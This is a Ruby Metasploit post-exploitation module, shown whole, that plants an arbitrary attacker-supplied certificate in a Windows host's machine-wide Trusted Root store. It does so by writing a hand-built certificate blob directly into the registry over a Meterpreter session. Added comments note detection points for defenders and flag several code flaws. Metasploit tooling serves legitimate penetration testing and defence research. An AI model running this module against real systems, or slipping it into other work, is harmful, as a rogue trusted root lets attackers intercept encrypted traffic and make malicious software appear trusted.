##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
  # Post module that writes a caller-supplied X.509 certificate into the
  # machine-wide Trusted Root store of a Windows Meterpreter session by
  # creating the store's registry key directly (no CryptoAPI/certutil call).
  #
  # Defender notes: the module self-declares CONFIG_CHANGES and IOC_IN_LOGS.
  # The durable artifact is a new subkey, named after the certificate's
  # SHA-1 thumbprint, under
  #   HKLM\Software\Microsoft\SystemCertificates\ROOT\Certificates
  # holding a REG_BINARY value called 'Blob'. Auditing value writes under
  # that key and diffing the ROOT store against a known-good baseline are
  # the natural detection points.

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Certificate Authority Injection',
        'Description' => %q{
          This module allows the attacker to insert an arbitrary CA certificate
          into the victim's Trusted Root store.
        },
        'License' => BSD_LICENSE,
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            # Only registry key creation/opening is needed from the agent.
            'Commands' => %w[
              stdapi_registry_create_key
              stdapi_registry_open_key
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        # Local (attacker-side) path of the certificate file to install.
        OptPath.new('CAFILE', [ true, 'Path to the certificate you wish to install as a Trusted Root CA.', ''])
      ]
    )
  end

  # Reads CAFILE, serialises the certificate into the property-blob layout
  # the Windows certificate store keeps in the registry, and writes it as the
  # 'Blob' value of a new key named after the cert's SHA-1 thumbprint.
  # Prints an error and returns early if the file cannot be stat'ed or the
  # target key already exists with values.
  def run
    certfile = datastore['CAFILE']

    # Check file path — any stat failure (missing, unreadable, not a file
    # path) is reported uniformly as "not found".
    begin
      ::File.stat(certfile)
    rescue StandardError
      print_error('CAFILE not found')
      return
    end

    # Load the file (binary mode, whole file in one read).
    f = ::File.open(certfile, 'rb')
    cert = f.read(f.stat.size)
    f.close

    # OpenSSL parses the PEM/DER text; nothing checks that the certificate
    # is actually a CA (basicConstraints) before it is installed as one.
    loadedcert = OpenSSL::X509::Certificate.new(cert)
    # Digests as arrays of two-character hex strings, one element per byte.
    certmd5 = Digest::MD5.hexdigest(loadedcert.to_der).scan(/../)
    certsha1 = Digest::SHA1.hexdigest(loadedcert.to_der).scan(/../)
    # NOTE(review): takes extensions[0] as the key identifier without
    # checking its OID — assumes subjectKeyIdentifier is the first
    # extension; confirm.
    cskiray = loadedcert.extensions[0].value.gsub(/:/, '').scan(/../)

    # DER length as a hex string, padded to four digits (16-bit value).
    # NOTE(review): the pad adds exactly one '0', so a DER shorter than
    # 0x100 bytes yields a 3-digit string and der_ray[1] below is nil.
    der_length = loadedcert.to_der.length.to_s(16)
    if (der_length.length < 4)
      der_length = "0#{der_length}"
    end

    # Split into byte pairs and swap them into little-endian order.
    der_ray = der_length.scan(/../)
    hex_der_length = [ der_ray[1], der_ray[0] ]

    # Raw DER as upper-case two-character hex strings.
    certder = loadedcert.to_der.each_byte.collect { |val| '%02X' % val }

    # Build the blob as a list of hex byte strings. Each section is a 12-byte
    # header — 4-byte property id, 4-byte 0x00000001, 4-byte data length, all
    # little-endian — followed by the data. The ids used (0x04 with a 16-byte
    # payload, 0x03 with 20 bytes, 0x14 with 20 bytes, 0x20 with the DER)
    # line up with the CryptoAPI MD5-hash, SHA1-hash, key-identifier and
    # certificate property ids (CERT_*_PROP_ID); confirm against the
    # CryptoAPI documentation.
    bblob = [ '04', '00', '00', '00', '01', '00', '00', '00', '10', '00', '00', '00' ]
    bblob += certmd5
    bblob += [ '03', '00', '00', '00', '01', '00', '00', '00', '14', '00', '00', '00' ]
    bblob += certsha1
    bblob += [ '14', '00', '00', '00', '01', '00', '00', '00', '14', '00', '00', '00' ]
    bblob += cskiray
    bblob += [ '20', '00', '00', '00', '01', '00', '00', '00' ]
    # Length field for the certificate section: two swapped bytes plus two
    # zero bytes make the 4-byte little-endian length.
    bblob += hex_der_length
    bblob += [ '00', '00' ]
    bblob += certder

    # Hex strings -> raw bytes.
    blob = bblob.map(&:hex).pack('C*')

    # Array#to_s renders ["ab", "cd", ...]; strip brackets, quotes, spaces and
    # commas to get the contiguous upper-case thumbprint that names the key.
    cleancertsha1 = certsha1.to_s.gsub(/[\s\[\\"\]]/, '').gsub(/,/, '').upcase
    catree = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'
    entire_key = "#{catree}\\#{cleancertsha1}"
    root_key, base_key = client.sys.registry.splitkey(entire_key)

    # Perform the registry operations

    # Ensure the cert doesn't already exist. Control flow to be aware of:
    # the write happens only in the rescue branch, i.e. when opening the key
    # raises (normally because it does not exist). An exception from
    # enum_value takes the same path, and a key that opens but holds no
    # values falls through with nothing written. Neither handle is closed.
    begin
      open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + 0x0000)
      values = open_key.enum_value
      if !values.empty?
        print_error('Key already exists!')
        return
      end
    rescue StandardError
      open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE + 0x0000)
      print_good("Successfully created key: #{entire_key}")

      # This single value write is what alters the host's trust configuration.
      open_key.set_value('Blob', REG_BINARY, blob)
      print_good('CA inserted!')
    end
  end
end